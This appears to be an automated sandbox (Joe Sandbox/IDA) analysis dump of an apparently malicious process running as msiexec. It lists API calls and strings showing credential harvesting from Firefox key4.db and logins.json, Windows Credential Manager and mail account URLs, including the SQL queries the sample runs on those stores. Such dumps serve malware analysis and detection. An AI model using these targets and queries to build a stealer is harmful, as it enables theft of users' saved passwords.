                                                                                                          • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00406782
                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                          • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                          • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                          • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                          • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                          • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                          • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                          • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                          • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                          • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                          Strings
                                                                                                          • key4.db, xrefs: 00406756
                                                                                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                          • , xrefs: 00406834
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memcmp$memsetstrlen
                                                                                                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                          • API String ID: 3614188050-3983245814
                                                                                                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                          • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                          • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                          APIs
                                                                                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                            • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                            • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                          • strlen.MSVCRT ref: 0040F139
                                                                                                          • strlen.MSVCRT ref: 0040F147
                                                                                                          • memset.MSVCRT ref: 0040F187
                                                                                                          • strlen.MSVCRT ref: 0040F196
                                                                                                          • strlen.MSVCRT ref: 0040F1A4
                                                                                                          • memset.MSVCRT ref: 0040F1EA
                                                                                                          • strlen.MSVCRT ref: 0040F1F9
                                                                                                          • strlen.MSVCRT ref: 0040F207
                                                                                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                          • API String ID: 2003275452-3138536805
                                                                                                          • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                          • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040C3F7
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                          • strrchr.MSVCRT ref: 0040C417
                                                                                                          • _mbscat.MSVCRT ref: 0040C431
                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                          • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                          • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                          • API String ID: 1012775001-1343505058
                                                                                                          • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                          • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00444612
                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                          • strlen.MSVCRT ref: 0044462E
                                                                                                          • memset.MSVCRT ref: 00444668
                                                                                                          • memset.MSVCRT ref: 0044467C
                                                                                                          • memset.MSVCRT ref: 00444690
                                                                                                          • memset.MSVCRT ref: 004446B6
                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                          • String ID: salu
                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                          • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                          • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                          • API String ID: 2449869053-232097475
                                                                                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                          APIs
                                                                                                          • sprintf.MSVCRT ref: 0040957B
                                                                                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                          • sprintf.MSVCRT ref: 004095EB
                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                          • memset.MSVCRT ref: 0040961C
                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                          • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                          • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                          APIs
                                                                                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                          APIs
                                                                                                          • wcsstr.MSVCRT ref: 0040426A
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                          • strchr.MSVCRT ref: 004042F6
                                                                                                          • strlen.MSVCRT ref: 0040430A
                                                                                                          • sprintf.MSVCRT ref: 0040432B
                                                                                                          • strchr.MSVCRT ref: 0040433C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                          • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                          • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                          APIs
                                                                                                          • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                            • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                            • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                            • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                          • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                          • memset.MSVCRT ref: 004097BD
                                                                                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                          • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                          • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                          • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                          • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                          • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                          • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                          APIs
                                                                                                          • strchr.MSVCRT ref: 004100E4
                                                                                                          • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                          • _mbscat.MSVCRT ref: 0041014D
                                                                                                          • memset.MSVCRT ref: 00410129
                                                                                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                          • memset.MSVCRT ref: 00410171
                                                                                                          • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                          • _mbscat.MSVCRT ref: 00410197
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                          • String ID: \systemroot
                                                                                                          • API String ID: 912701516-1821301763
                                                                                                          • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                          • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                          • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                          • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$strlen
                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                          • API String ID: 2619041689-3408036318
                                                                                                          • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                          • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                          • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                          • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                          APIs
                                                                                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                          • wcslen.MSVCRT ref: 0040874A
                                                                                                          • wcsncmp.MSVCRT ref: 00408794
                                                                                                          • memset.MSVCRT ref: 0040882A
                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                          • wcschr.MSVCRT ref: 0040889F
                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                          • API String ID: 3318079752-260894208
                                                                                                          • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                          • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                          • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                          • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004037EB
                                                                                                          • memset.MSVCRT ref: 004037FF
                                                                                                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                          • strchr.MSVCRT ref: 0040386E
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                          • strlen.MSVCRT ref: 00403897
                                                                                                          • sprintf.MSVCRT ref: 004038B7
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
